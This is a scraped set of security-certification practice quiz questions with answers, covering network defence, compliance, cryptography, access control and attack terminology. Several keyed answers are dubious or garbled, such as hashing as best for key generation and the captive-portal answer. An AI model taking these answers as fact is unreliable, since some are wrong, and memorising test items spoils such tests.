UCERTIFY QUIZZES

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

WHAT FEATURE PRIMARILY HELPS TO PROTECT AGAINST POISONING ATTACKS? FLOOD GUARD FEATURES SNMPV3 ARP INSPECTION LOOP PROTECTION

ARP INSPECTION

A THIRD-PARTY TEAM IS GOING TO FORMALLY EXAMINE YOUR ORG'S OVERALL SEC PRACTICES TO MAKE SURE THEY MEET REG COMPLIANCE GOALS. YOUR ORG MAY BE FINED IF IT FAILS. WHAT WOULD THIS VERIFICATION PROCESS BE CALLED? (SECURITY FUNDAMENTALS) AUDIT CERTIFICATION EVALUATION ASSESSMENT

AUDIT

WHICH OF THE FOLLOWING IS A SITE W/O HARDWARE SET UP IN ADVANCE? COLD SPARE COLD SITE HOT SPARE HOT SITE

COLD SITE

WHICH OF THE FOLLOWING SHOULD YOU FOLLOW FOR SECURING ACCOUNTS IN ALMOST ANY IDENTITY SYSTEM? WHEN GIVING MULTIPLE ACCOUNTS TO A SINGLE USER ENSURE THAT EACH ACCOUNT HAS THE SAME PASSWORD USE GENERIC ACCOUNTS ASSIGN PERMISSIONS TO INDIVIDUAL ACCOUNTS RATHER THAN GROUPS CHOOSE USER NAMES CAREFULLY ACCORDING TO A STD NAMING CONVENTION

- CHOOSE USER NAMES CAREFULLY ACCORDING TO NAMING CONVENTION - WHERE POSSIBLE, ASSIGN PERMISSIONS TO GROUPS RATHER THAN INDIVIDUAL ACCOUNTS - WHERE POSSIBLE, AVOID THE USE OF GENERIC ACCOUNTS (GUEST ACCOUNTS) - ASSIGN ADMINISTRATORS 2 ACCOUNTS EACH: AN ADMINISTRATOR ACCOUNT FOR TASKS THAT REQUIRE ESCALATED PRIVILEGES, AND A STD USER ACCT FOR EVERYTHING ELSE - WHEN GIVING MULTIPLE ACCOUNTS TO A SINGLE USER, ENSURE THAT EACH ACCOUNT HAS A SEPARATE PASSWORD

YOU'RE HARDENING A WEB APPLICATION. WHICH OF THESE FEATURES YOU SHOULD ENSURE WHILE HARDENING THE UNDERLYING HOST AND NETWORK? - MAKE SURE THAT APP COMPONENTS AND USERS OP IN A MOST PRIVILEGE ENVIRONMENT - CONDUCT YEARLY SECURITY AUDITS - ENABLE UNNECESSARY APPS, SERVICES, AND USER ACCTS - ENSURE HOST IS KEPT UPDATED - PROTECT NETWORK WITH FIREWALLS, NIDS/NIPS, OR EVEN SPECIFIC WEB APP FIREWALLS

- ENSURE HOST IS KEPT UPDATED - PROTECT THE NETWORK WITH FIREWALLS, NIDS/NIPS, OR EVEN SPECIFIC WEB APP FIREWALLS - DISABLE UNNECESSARY APPS, SERVICES, AND USER ACCOUNTS - APPLY ANTIVRUS AND HIDS/HIOS SOFTWARE ON HOST - IF APP USES MULTIPLE SERVERS

12 MANDATED CONTROLS OF PCI DSS

- INSTALL & MAINTAIN FIREWALL CONFIGURATION TO PROTECT CARDHOLDER DATA - DO NOT USE VENDOR-SUPPLIED DEFAULTS FOR SYSTEM PASSWORDS & OTHER SECURITY PARAMETERS - PROTECT STORED CARDHOLDER DATA - ENCRYPT TRANSMISSION OF CARDHOLDER DATA ACROSS OPEN, PUBLIC NETWORKS - USE AND REG. UPDATE ANTIVIRUS SOFTWARE OR PROGRAMS - DEVELOP AND MAINTAIN SECURE SYSTEMS AND APPLICATIONS - RESTRICT ACCESS TO CARDHOLDER DATA BY BUSINESS NEED TO KNOW - ASSIGN A UNIQUE ID TO EACH PERSON W/COMPUTER ACCESS - RESTRICT PHYSICAL ACCESS TO CARDHOLDER DATA - TRACK AND MONITOR ALL ACCESS TO NETWORK RESOURCES AND CARDHOLDER DATA - REGULARLY TEST SECURITY SYSTEMS AND PROCESSES - MAINTAIN A POLICY THAT ADDRESSES INFO SEC FOR ALL PERSONNEL

HOW MANY HARD DRIVES DOES RAID 10 REQUIRE? - 2 HARD DRIVES FOR THE DISK MIRROR AND 1 MORE DISK TO STRIPE THE MIRRORED DISKS - 4 HARD DRIVES FOR THE DISK MIRROR AND 1 MORE DISK TO STRIPE THE MIRRORED DISKS - 1 HARD DRIVE FOR THE DISK MIRROR AND 2 MORE DISKS TO STRIPE THE MIRRORED DISKS - 2 HARD DRIVES FOR THE DISK MIRROR AND 2 MORE DISKS TO STRIPE THE MIRRORED DISKS

2 HARD DRIVES FOR THE DISK MIRROR AND 2 MORE DISKS TO STRIPE THE MIRRORED DISKS

IN ACTIVE DIRECTORY, WHAT IS THE BEST PLACE TO ASSIGN PERMISSIONS? A UNIVERSAL GROUP AN INDIVIDUAL USER A GLOBAL GROUP A DOMIN LOCAL GROUP

A DOMAIN LOCAL GROUP

WHICH OF THE FOLLOWING STATEMENTS IS TRUE REGARDING VIRTUALIZATION? - ITS DIFFICULT TO CREATE A SNAPSHOT OF A VM - VIRTUAL TEST ENVIRONMENTS ARE AN IDEAL PLACE TO THOROUGHLY TEST SEC CONTROLS AFTER DEPLOYING THEM ON THE "REAL" NETWORK - A TEST VM IS ALSO USEFUL FOR TESTING AN OS OR APPLICATION PATCHES TO MAKE SURE THEY DONT INTRODUCE ANY PROBLEMS - ITS REASONABLY EASY TO MAINTAIN LOW AVAILABILITY FOR SERVICES HOSTED ON A VM

A TEST VM IS ALSO USEFUL FOR TESTING AN OS OR APPLICATION PATCHES TO MAKE SURE THEY DONT INTRODUCE ANY PROBLEMS

YOU WANT TO USE YOUR ANDROID PHONE TO STORE AND MANAGE CRYPTOGRAPHIC CERTIFICATES. WHICH TYPE OF SOLUTION WILL YOU CHOOSE TO DO THIS USING SECURE HARDWARE? MDM A WIRELESS TPM SEAndriod A microSD HSM

A microSD HSM (A Hardware Security Module)

WHICH AAA ELEMENT TRACKS THE ACTIONS OF AN AUTHENTICATED USER FOR LATER REVIEW? AUTHORIZATION IDENTIFICATION ACCOUNTING AUTHENTICATION

ACCOUNTING TRACKS ACTIONS OF AN AUTHENTICATED USER FOR LATER REVIEW AUTHENTICATION VERIFIES PRINCIPALS ID AUTHORIZATION SPECIFIES EXACT RESOURCES A GIVEN PRINCIPAL IS ALLOWED TO ACCESS

WHICH OF THE FOLLOWING IS A LIST ATTACHED TO A RESOURCE, GIVING PERMISSIONS OR RULES ABOUT PRECISELY WHO CAN ACCESS IT? QOS 802.1Q DIFFERENTIATED SERVICES ACL

ACL

WHICH OF THE FOLLOWING DELIVERS ADVERTISEMENTS TO THE INFECTED SYSTEM, USUALLY WITHIN A BROWSER OR OTHER APPLICATION WINDOWS? TROJAN ADWARE WORM VIRUS

ADWARE

IF ALICE WISHES TO DIGITALLY SIGN THE MESSAGE THAT SHE IS SENDING TO BOB, WHAT KEY WOULD SHE USE TO CREATE THE DIGITAL SIGNATURE? (CRYPTOGRAPHY) ALICE'S PRIVATE KEY BOB'S PUBLIC KEY BOB'S PRIVATE KEY ALICE'S PUBLIC KEY

ALICE'S PRIVATE KEY

WHICH ONE OF THE FOLLOWING STATEMENTS IS NOT TRUE ABOUT COMPENSATING CONTROLS UNDER PCI DSS? (SECURITY FUNDAMENTALS) DO NOT USE. ENDOR-SUPPLIED DEFAULT FOR SYSTEM PASSWORDS & OTHER SECURITY PARAMETERS ALLOW PHYSICAL ACCESS TO CARDHOLDER ENCRYPT TRANSMISSION OF CARDHOLDER DATA ACROSS OPEN PUBLIC NETWORKS USE & REGULARLY UPDATE ANTIVIRUS SOFTWARE OR PROGRAMS

ALLOW PHYSICAL ACCESS TO CARDHOLDER DATA

WHICH OF THE FOLLOWING CAN YOU USE FOR NETWORK MAPPING AND SERVICE ENUMERATION THOUGH THEY CAN PERFORM OTHER TASKS? RISK MGMT) ANGRY IP SCANNER AIRCRACK-NG WIFITE KISMET

ANGRY IP SCANNER

WHAT CONNECTION TYPE IS VERY SIMILAR TO BLUETOOTH BUT IS USED BY MORE SPECIALIZED DEVICES? NFC RFID ANT+ GPS

ANT+

WHICH OF THE FOLLOWING ASSESSMENTS WILL USE FOR IDENTIFYING INSIDER THREATS? (RISK MGMT) BEHAVIORAL INSTINCTUAL HABITUAL IOCS

BEHAVIORAL

WHAT KIND OF PENETRATION TEST INVOLVES A TESTER WITH NO KNOWLEDGE OF YOUR NETWORK CONFIGURATION BEFORE THE TEST? (RISK MGMT) BLACK HAT BLACK BOX WHITE HAT WHITE BOX

BLACK BOX

WHICH OF THE FOLLOWING ATTACKS USES STATEMENTS THAT SHOULD CREATE VERIFIABLE CHANGES IN PAGE OUTPUT, OR ELSE PERFORMS TIME-INTENSIVE OPS AND WATCHES FOR SERVER DELAY? STACKED QUERY XSRF BLIND INJECTION SIGNATURE EVASION

BLIND INJECTION

A COMPANY CONFIGURES WORKSTATIONS TO RUN SOFTWARE ON AN UNAPPROVED LIST. WHAT IS THIS AN EXAMPLE OF? ALLOW LISTING SANDBOXING HARDENING BLOCK LISTING

BLOCK LISTING (DENY LISTS) USES A LIST OF SOFTWARE THAT IS NOT ALLOWED FOR USE (BLACKLISTING)

CAMILLA WANTS TO CREATE AN AGREEMENT DEFINING THE GENERAL RELATIONSHIP BETWEEN BUSINESS PARTNERS THAT DEFINES HOW EACH ORG SHARES PROFITS, LOSSES, PROPERTY, AND LIABILITY. WHAT TYPE OF AGREEMENT SHOULD CAMILLA USE? BPA ISA NDA MOU

BPA (BUSINESS PARTNERSHIP AGREEMENT)

WHICH OF THE FOLLOWING IS AN ON-PATH ATTACK IN WHICH A TROJAN OR OTHER SPYWARE MODIFIES THE WEB PAGES THAT THE USER VIEWS OR THE ACTIONS THAT THE USER TAKES? MODIFIED HOSTS FILE BROWSER-BASED COMPROMISED ROUTER COMPROMISED SERVER

BROWSER-BASED

YOU HAVE INVESTIGATED AN ATTACK WHERE THE ATTACKER HAS ENTERED A VERY LOG STRING INTO AN INPUT FIELD, WHICH WAS FOLLOWED BY A SYSTEM COMMAND. WHAT TYOE OF ATTACK LIKELY TOOK PLACE? XSS BUFFER OVERFLOW XSRF LDAP INJECTION

BUFFER OVERFLOW

SOMEONE STOLE THOUSANDS OF CUSTOMER RECORDS FROM YOUR ORG'S DATABASE. WHAT ASPECT OF SECURITY WAS PRIMARILY ATTACKED? (SECURITY FUNDAMENTALS) INTEGRITY AVAILABILITY PORTABILITY CONFIDENTIALITY

CONFIDENTIALITY

WHICH OF THE FOLLOWING MAKES THE MATHEMATICAL RELATIONSHIP BETWEEN THE PLAINTEXT AND THE KEY AS COMPLEX AS POSSIBLE, SO THAT A PARTIALLY CORRECT KEY IS USELESS TO AN ATTACKER? (CRYPTOGRAPHY) DIFFUSION CONFUSION TRANSPOSITION ONE-TIME PAD l

CONFUSION

YOUR ANALYSIS REVEALS THAT A WEB APPLICATION OUTAGE WAS CAUSED BY ONE OF THE COMPANY'S DEVELOPERS UPLOADING A NEWER VERSION OF THE THIRD PARTY LIBRARIES THAT WERE SHARED AMONG SEVERAL APPS. WHICH OF THE FOLLOWING IMPLEMENTATIONS WOULD BE BEST TO PREVENT THE ISSUE FROM REOCCURRING? SECURITY GROUPS INSTANCE AWARENESS CONTAINERIZATION API INSPECTION

CONTAINERIZATION

WHAT AUTHENTICATION STD IS USED BY ACTIVE-DUTY US MILITARY PERSONNEL? OTP PIV CAC SIM

CAC (COMMON ACCESS CARD)

WHICH OF THE FOLLOWING SOLUTIONS WOULD BE BEST IN ALLOWING AN ENTERPRISE TO CENTRALLY APPLY ITS SECURITY POLICIES AND PROVIDE MANAGEABILITY AND VISIBILITY INTO THE PLATFORMS? PRIVATE DEPLOYMENT SECURITY AS A SERVICE CASB OFF-PREMISE POLICIES

CASB

YOU NEED TO INSTALL A NEW METAL FIRE EXTINGUISHER NEXT TO THE SERVER CLOSET. WHAT CLASS WOULD BE MOST USEFUL? CLASS D CLASS A CLASS B CLASS K

CLASS D

WHICH POLICY ENSURES THAT ALL THE IMPORTANT DOCUMENTS, CONFIDENTIAL LETTERS, ETC. ARE REMOVED AND LOCKED AWAY WHEN AN EMPLOYEE LEAVES HIS/HER WORKSTATION? SEPARATION OF DUTIES MANDATORY VACATION CLEAN DESK POLICY AUP

CLEAN DESK POLICY

YOU ARE DEVELOPING AN APPLICATION FOR SALE TO THE PUBLIC. YOU WANT TO ASSURE YOUR USERS THAT THE APP THEY RECEIVE ACTUALLY CAME FROM YOU. TRUSTED HARDWARE CODE SIGNING FIREWALL HIDS

CODE SIGNING

YOU'RE BRINGING ALL THE CODE CHANGES FROM. MULTIPLE TEAM MEMBERS INTO THE SAME DEVELOPMENT PROJECT THRU AUTOMATION. WHICH OF THE FOLLOWING BEST DESCRIBES THIS PROCESS? - CONTINUOUS DELIVERY - CONTINUOUS DEPLOYMENT - CONTINUOUS INTEGRATION - CONTINUOUS MONITORING

CONTINUOUS INTEGRATION

STEF WANTS TO SELECT A MOBILE DEVICE DEPLOYMENT THAT PROVIDES EMPLOYEES WITH DEVICES THAT ARE COMPANY-ISSUED AND SUPPORTED, BUT EMPLOYEES CAN USE THEM FOR PERSONAL REASONS TOO. WHICH OF THE FOLLOWING IS THE MOST LIKELY CULPRIT? BYOD CYOD COBO COPE

COPE

YOU ARE ASKED TO ANALYZE THE AGGREGATED EVENTS TO FIND USEFUL DATA THAT MIGHT NEED ADDITIONAL HUMAN REVIEW. WHICH OF THE FOLLOWING SIEM SOFTWARE FEATURES WILL YOU USE? LOG RETENTION AGGREGATION CORRELATION ALERTS

CORRELATION

A Sec analyst has been asked to investigate a situation after the SOC started to receive alerts from the SIEM. The analyst first looks at the domain controller and finds that an attack took place where the "dictionary " is made up of a stolen username & password pairs from another compromised system. Which of the following events has taken place? ZERO DAY MITM CRED STUFFING BIRTHDAY

CRED STUFFING

ASSUMING THAT ALL 4 ROLES EXIST SEPARATELY AT YOUR COMPANY, WHO OVEERSEES STRATEGIC SECURITY NEEDS, WITH A FOCUS ON ORGANIZATIONAL RISK MGMT? (SECURITY FUNDAMENTALS) CPO CIO CCO CSO

CSO - CHIEF SECURITY OFFICER

IN WHICH OF THE FOLLOWING CAN THE EMPLOYEE CHOOSE BETWEEN A LIST OF DEVICES THE COMPANY HAS APPROVED FOR SECURITY FEATURES AND SUPPORT? ASSET TRACKING BYOD GPS CYOD

CYOD (CHOOSE YOUR OWN DEVICE)

WHICH OF THE FOLLOWING INCLUDES EXPLICIT ACES SET ON THE OBJECT, INHERITED ACES RECEIVED FROM ITS PARENTS, AND GENERIC ACES FROM ITS CLASS? DACL IdP KBA SID

DACL - FULL LIST OF ACES THAT APPLY TO AN OBJECT

WHO AMONG THE FOLLOWING IS A SYSTEM ADMINISTRATOR RESPONSIBLE FOR CREATING AND ENFORCING THE TECHNICAL CONTROLS REGARDING ACCESS TO DATA, UNDER THE DIRECTION OF ITS OWNER? DATA STEWARD PRIVACY OWNER DATA CUSTODIAN DATA OWNER

DATA CUSTODIAN

Which of the following is the correct sequence of encryption ciphers from the weakest to the strongest? (CRYPTOGRAPHY) DES - BLOWFISH - AES - 3DES 3DES - DES - AES - BLOWFISH 3DES -BDES - BLOWFISH - AES DES - 3DES - BLOWFISH - AES

DES - 3DES - BLOWFISH - AES

WHAT KIND OF INFORMATION IS MOST IMPORTANT FOR AN INCIDENT RESPONSE TEAM? - DETAILED FORENSICS PROCEDURES AND RELATED LEGAL REQUIREMENTS - DETAILED SYSTEM DOCUMENTATION AVAILABLE AT ALL TIMES - AWARENESS OF THE EXTRA PERMISSIONS THEY'VE BEEN GIVEN - HIGH-LEVEL UNDERSTANDING OF ASSETS OF THE ORG

DETAILED FORENSICS PROCEDURES AND RELATED LEGAL REQUIREMENTS

YOU ARE LOOKING FORNA CONTROL THST WOULD DISCOURAGE THE ATTACKER FROM ATTEMPTING TO GAIN ACCESS. WHAT TYPE OF SECURITY CONTROL WILL YOU IMPLEMENT? PREVENTIVE CORRECTIVE DETERRENT DETECTIVE

DETERRENT

ALICE, A SECURITY ANALYST, PERFORMS A BACKUP THAT CAPTURES THE CHANGES SINCE THE LAST FULL BACKUP. WHAT TYPE OF BACKUP HAS SHE PERFORMED? DIFFERENTIAL BACKUP INCREMENTAL BACKUP NEW FULL BACKUP SNAPSHOT

DIFFERENTIAL BACKUP

WHAT SERVICE GETS ENABLED WHEN YOU IMPLEMENT LDAP FOR YOUR ORG? DIRECTORY SERVICE BIOMETRIC ID PROVIDER ATTESTATION FEDERATION

DIRECTORY SERVICE

WHICH OF THE FOLLOWING MIGHT PROTECT USERS FROM COPYING SENSITIVE FILES TO EXTERNAL MEDIA? FDE TPM HSM DLP

DLP (DATA LOSS PREVENTION) - PROTECTS ALL SENSITIVE DATA THAT PASSES THRU ENDPOINT ITS INSTALLED ON

YOU' VE JUST DISCOVERED A KIND OF MALWARE THAT OVERWRITES THE HOSTS FILE TO REDIRECT WEB SEARCHES TO A MALICIOUS SITE. WHAT TECHNIQUES DOES IT MOST LIKELY USE? ARP POISONING VLAN HOPPING DOMAIN HIJACKING DNS POISONING

DNS POISONING

WHAT TYPE OF XSS ATTACK WOULD NOT BE VISIBLE TO A SECURITY ANALYST INSPECTING THE HTML SOURCE CODE IN A BROWSER? DOM-BASED PERSISTENT PARAMETER POLLUTION XSRF

DOM-BASED (DOCUMENT OBJECT MODEL)

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING DOWNGRADES? DOWNGRADES DONT REQUIRE FULL INSTALLATION DOWNGRADES MUST BE COMPLETED ALL AT ONCE DOWNGRADES REQUIRE MORE COMPLEX PROCEDURES THAN UPGRADES DOWNGRADES ARE GENERALLY LESS SUPPORTED THAN UPGRADES

DOWNGRADES ARE GENERALLY LESS SUPPORTED THAN UPGRADES

WHICH DOCUMENT IS A TECHNICAL PROCEDURE FOR RESTORING SERVICES AND OPERATIONS AFTER SIGNIFICANT DISRUPTIONS? DRP COOP BIA BCP

DRP (DISASTER RECOVERY PLAN)

Which of the following is a NIST std that uses a discrete logarithm & is faster for data encryption & signature verification? (CRYPTOGRAPHY) DSA ECC HMAC DH

DSA (Digital Signature Algorithm)

A NEW PRIVACY LAW DEMANDS MORE ROBUST PROTECTION FOR YOUR CUSTOMER DATABASE. FORST, YOU RESEARCHED DATABASE SECURITY PRODUCTS TO FIND WHICH WOULD RELIABLY MEET YOUR NEEDS. NOW THAT YOU'VE SELECTED AND INSTALLED ONE, YOU'RE CURRENTLY TRAINING ADMINISTRATORS TO PERFORM INTEGRITY CHECKS, UPDATE THE SOFTWARE, AND REVIEW LOGS FOR SUSPICIOUS ACTIVITIES. WHAT ARE YOU PRACTICING? (SECURITY FUNDAMENTALS) REGULATORY COMPLIANCE DUE CARE AVAILABILITY NEGLIGENCE

DUE CARE

WHICH OF THE FOLLOWING IS THE TECHNIQUE USED TO LOOK FOR INFORMATION IN TRASH OR AROUND DUSTBIN CONTAINER? BAITING PIGGYBACKING DUMPSTER DIVING PRETEXTING

Dumpster diving

WHICH OF THE FOLLOWING IS A PROCESS WHERE YOU IDENTIFY, SECURE, AND ANALYZE DATA WITH THE INTENT OF USING IT IN A CRIMINAL OR CIVIL COURT CASE? INDUSTRIAL CAMOUFLAGE SIGNAL SURVEYS EDISCOVERY DUAL CONTROL VIOLATION

EDISCOVERY

WHICH OF THE FOLLOWING IS AN EXTENSION OF THE DIFFIE-HELLMAN KEY EXCHANGE INTO A COMPLETE DISCRETE LOGARITHM CRYPTOSYSTEM, ALLOWING FOR TASKS LIKE GENERAL ENCRYPTION? (CRYPTOGRAPHY) RSA MD5 EIGamal RIPEMD

EIGamal

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING TACACS+ OVER RADIUS? - ENCRYPTS ENTIRE ACCESS REQUEST PACKETS - BETTER ABLE TO SUPPORT IP PACKETS - LESS COMPLICATED TO ADMINISTER - USES TCP PORT 149

ENCRYPTS ENTIRE ACCESS REQUEST PACKETS

WHICH OF THE FOLLOWING ENCRYPTS THE PACKET PAYLOAD, ALONG WITH INTEGRITY AND AUTHENTICATION INFORMATION? AH CLIENTLESS VPN ESP IKE

ESP (ENCAPSULATING SECURITY PAYLOAD)

WHICH OF THE FOLLOWING IS A ROGUE AP THAT HAS THE SAME SSID AND SECURITY SETTINGS AS A LEGIT AP, SO THAT USER'S MIGHT CONNECT TO IT INSTEAD OF THE REAL ONE/ JAMMING EVIL TWIN NFC VULNERABILITIES BLUEJACKING

EVIL TWIN

WHAT KIND OF PROXY WOULD YOU USE TO MEDIATE COMMS BET. LAN CLIENTS AND INTERNET SERVERS BUT REQUIRE CLIENT-SIDE CONFIGURATION? REVERSE FORWARD ANONYMOUS TRANSPARENT

FORWARD

Which of the following is a certificate backed by a stricter identity validation process than the CA's default? (CRYPTOGRAPHY) Extended Validation Email Domain validation Machine Authentication

Extended Validation

YOUR COMPANY HAS RECEIVED AN EMAIL THAT CONTAINED A VIRUS ATTACHED. LATER, YOU HAVE REALIZED THAT NO ALARM IS RAISED AS THE EMAIL SECURITY SOLUTION THAT YOUR COMPANY USES DIDNT DETECT THE THREAT. WHAT OCCURRED? (SECURITY FUNDAMENTALS) True negative True positive False negative False positive

FALSE NEGATIVE

THE US GOVT AGENCY PLANS TO MIGRATE SOME OF ITS INTERNALLY HOSTED DATA TO A CLOUD-BASED SERVICE. YOU NEED TO MAKE SURE THE PROPOSED VENDOR CAN MEET THE SAME SEC REQS AS THE CURRENT SOLUTION. WHAT ARE YOU CURRENTLY PRACTICING? (SECURITY FUNDAMENTALS) FISMA COMPLIANCE DUE DILIGENCE DUE CARE GLBA COMPLIANCE GDPR COMPLIANCE

FISMA COMPLIANCE & DUE DILIGENCE

WHICH OF THE FOLLOWING IS AN INTEGRATED CIRCUIT WITH A LOGICAL STRUCTURE THAT CAN BE REPROGRAMMED AFTER MANUFACTURE, IN CONTRAST TO THE PRE-PRINTED LOGIC FUNCTION FOUND IN A MICROPROCESSOR OR ASIC? SoC FPGA RTOS IoT

FPGA (FIELD-PROGRAMMABLE GATE ARRAY)

WHICH OF THE FOLLOWING SECURE PROTOCOLS ADD SSL/TLS SECURITY TO PROTOCOLS THAT WER INSECURE ON THEIR OWN? FTPS HTTPS SFTP SNMPV3 SSH

FTPS, HTTPS, SNMPV3

YOUR FRIEND IS A GOVT CONTRACTOR WHO DISCLOSED SENSITIVE GOVT INFO TO YOU TO UNCOVER WHAT HE BELIEVED WERE UNETHICAL ACTIVITIES. WHICH OF THE FOLLOWING TERMS BEST DESCRIBES HIS ACTIVITIES? CHOOSE 2 (RISK MGMT) HACKTIVIST INSIDER ORG CRIME APT STATE ACTOR

HACKTIVIST & INSIDER

WHICH CATEGORY OF ATTACKERS MIGHT ALSO BE CALLED CYBERTERRORISTS? (RISK MGMT) HACKTIVISTS INSIDERS SCRIPT KIDDIES COMPETITORS

HACKTIVISTS

WHICH OF THE FOLLOWING IS LEAST VOLATILE ACCORDING TO THE FORENSIC ORDER OF VOLATILITY? HARD DRIVES ROUTING TABLES CACHE MEMORY CPU REGISTERS

HARD DRIVES ORDER OF VOLATILITY: - CPU REGISTERS & CACHE MEMORY - ROUTING TABLES, ARP CACHE, PROCESS TABLES, AND KERNEL STATS - OTHER RAM CONTEXTS - SWAP FILES OR OTHER TEMP FILE SYSTEMS - OTHER DATA ON HARD DRIVES OR FLASH MEDIA - NETWORK LOGGING DATA - FIRMWARE OR PHYSICAL CONFIGURATION - ARCHIVAL MEDIA SUCH AS OPTICAL DISCS OR PRINT-OUTS

YOUR COMPANY IS DEVELOPING AN APPLICATION IN WHICH A PRIVATE US-BASED HOSPITAL WILL ALLOW PATIENTS TO ACCESS THEIR MEDICAL RECORDS ONLINE. REGARDLESS OF WHAT OTHER DATA THE APPLICATION HANDLES, WHAT KIND OF COMPLIANCE DO YOU ALREADY KNOW YOU NEED TO RESEARCH? (SECURITY FUNDAMENTALS) FERPA FISMA HIPPA PCI DSS

HIPPA

WHICH OF THE FOLLOWING ARE USED IN DATA CENTERS AS PART OF AIRFLOW AND THERMAL REGISTRATION? AIR GAPS BOLLARDS HOT AND COLD AISLES VISITOR LOGS

HOT AND COLD AISLES

What type of cryptography is best suited for key generation? (CRYPTOGRAPHY) Symmetric encryption One-Time Pad Hashing Asymmetric encryption

Hashing

YOUR DEPARTMENT HAS IMPLEMENTED A DECOY HAVING NO USEFUL RESOURCES AND ISOLATED IT FROM THE REST OF THE NETWORK SO THAT COMPROMISING IT WON'T EVEN BE USEFUL FOR MOUNTING AN INSIDE ATTACK. WHAT TECHNIQUE IS BEING USED? IPS HONEYPOT ANOMALY ANALYSIS NGFW

Honeypot

WHICH OF THE FOLLOWING REPS THE CORRECT ORDER OF STEPS INVOLVED IN A COMPLETE RISK ASSESSMENT? (RISK MGMT) - ID ASSETS AT RISK - EVAL THREAT PROBABILITY - CONDUCT THREAT ASSESSMENT - ANALYZE BUSINESS IMPACT - PRIORITIZE RISKS - CREATE MITIGATION STRATEGY - ID ASSETS AT RISK - CREATE A MITIGATION STRATEGY - CONDUCT A THREAT ASSESSMENT - ANALYZE BUSINESS IMPACT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS -ID ASSETS AT RISK - CONDUCT A THREAT ASSESSMENT - ANALYZE BUSINESS IMPACT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS - CREATE A MITIGATION STRATEGY - ID ASSETS AT RISK - CONDUCT A THREAT ASSESSMENT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS - ANALYZE BUSINESS IMPACT - CREATE A MITIGATION STRATEGY

ID ASSETS AT RISK - CONDUCT A THREAT ASSESSMENT - ANALYZE BUSINESS IMOACT - EVAL THREAT PROBABILITY - PRIORITIZE RISKS - CREATE A MITIGATION STRATEGY

YOU HAVE IMPLEMENTED A PASSIVE MONITORING SYSTEM THAT IS DESIGNED TO KEEP ADMINISTRATORS AWARE OF MALICIOUS ACTIVITY AND CAN RECORD DETECTED INTRUSIONS IN A DATABASE AND SEND ALERT NOTIFICATIONS SO THAT THE ADMINISTRATORS CAN TAKE ACTION. WHICH OF THE FOLLOWING HAVE YOU IMPLEMENTED? APPLICATION LAYER FIREWALL IDS IPS STATEFUL FIREWALL

IDS

WHICH OF THE FOLLOWING STATEMENTS IS TRUE REGARDING RAID? - ALWAYS USE RAID AS A SUBSTITUTE FOR MAKING REGULAR DATA BACKUPS - IF RAID CONTROLLER FAILS, OR IF MALWARE OR OTHER SOFTWARE WRITES CORRUPTED DATA TO THE DISK, IT MATTERS HOW MANY MIRRORED OR PARITY DISKS YOU HAVE - MOST USE HOT-SWAPPABLE DRIVES SO THAT YOU CAN REPLACE A FAILED DRIVE AND REBUILD ARRAY - IF ONE OF THE DRIVES IN THE ARRAY FAILS, THE DATA STORED ON THE FAILED DRIVE CAN BE RECREATED FOR THE PARITY DATA ON THE REMAINING DRIVES

IF ONE OF THE DRIVES IN THE ARRAY FAILS, THE DATA STORED ON THE FAILED DRIVE CAN BE RECREATED FOR THE PARITY DATA ON THE REMAINING DRIVES

WHICH OF THE FOLLOWING IS A SPECIFIC IMPLEMENTATION OF THE ISAKMP FRAMEWORK AND AUTHENTICATES SAS BETWEEN 2 HOSTS AND EXCHANGES ENCRY7KEYS TO SET UP A SECURE CHANNEL? AH ESP IKE L2TP

IKE (INTERNET KEY EXCHANGE)

WHICH OF THE FOLLOWING IS A MODEL FOR ACCESS SECURITY THAT DENIES THE ACCESS UNLESS A RULE EXPLICITLY ALLOWS IT? EXPLICIT ALLOW EXPLICIT DENY IMPLICIT ALLOW IMPLICIT DENY

IMPLICIT DENY

WHICH ELEMENT OF YOUR RISK MITIGATION STRATEGY PROVIDES THE BEST HELP WHEN SOMETHING DOES GO WRONG WITH SECURITY, YOU NEED TO DETERMINE WHAT HARM WAS DONE, AND RESTORE THE SYSTEM TO A SECURE STATE? (RISK MGMT) SECURITY AUDITS TECHNICAL CONTROLS CHANGE MGMT INCIDENT MGMT

INCIDENT MGMT

WHICH DOCUMENT SPECIFICALLY COVERS PROCEDURES FOR RESTORING INDIVIDUAL INFORMATION SYSTEMS AFTER A DISASTER OR FOR MAINTAINING PARTIAL FUNCTION DURING THE RECOVERY PROCESS? BCP BIA ISCP COOP

ISCP (INFORMATION SYSTEM CONTINGENCY PLAN)

YOU'RE DISCUSSING WITH YOUR COLLEAGUES ABOUT WPA AUTHENTICATION AND ONE OF THEM HAS ASKED ABOUT THE CAPTIVE PORTAL. WHICH OF THE FOLLOWING WILL YOU ANSWER? IT RELIES ON WIRELESS-SPECIFIC TECH USERS CAN FREELY ACCESS THE NETWORK UNTIL THEY SATISFY THE CONDITIONS OF THE PORTAL IT CAN BE BYPASSED AND ONLY PROVIDE ENCRYPTION WHEN USED WITH THE OPEN FEATURE OF WPA3 IT IS THE PART OF THE WI-FI SPECIFICATION

IT CAN BE BYPASSED AND ONLY PROVIDE ENCRYPTION WHEN USED WITH THE OPEN FEATURE OF WPA3

WHICH OF THE FOLLOWING STATEMENTS IS CORRECT REGARDING BITLOCKER? EACH USER ACCOUNT HAS A SEPARATE BITLOCKER KEY STORED IN ITS SETTINGS IT PROTECTS ENTIRE DRIVES W/PERSONAL AND SYSTEM FILES ANY USER CAN INDEPENDENTLY ENCRYPT FILES USING BITLOCKER BITLOCKER ENCRYPTED FILES ARE UNREADABLE TO OTHER USERS ON THE SAME COMPUTER

IT PROTECTS ENTIRE DRIVES WITH PERSONNEL AND SYSTEM FILES ALL USERS ON A BITLOCKER-ENCRYPTED SYSTEM CAN ACCESS THE FULL SYSTEM BITLOCKER MUST BE ENABLED FOR THE ENTIRE COMPUTER BY ANY ADMINISTRATOR BITLOCKER USES A KEY FOR THE ENTIRE SYSTEM, WHICH MUST BE SUPPLIED ON SYSTEM STARTUP

WHICH OF THE FOLLOWING USES MACHINE-READABLE DEFINITION FILES TO GENERATE AND DEPLOY SERVICE COMPONENTS IN AN AUTOMATED PROCESS? VPC EBS IoT IaC

IaC

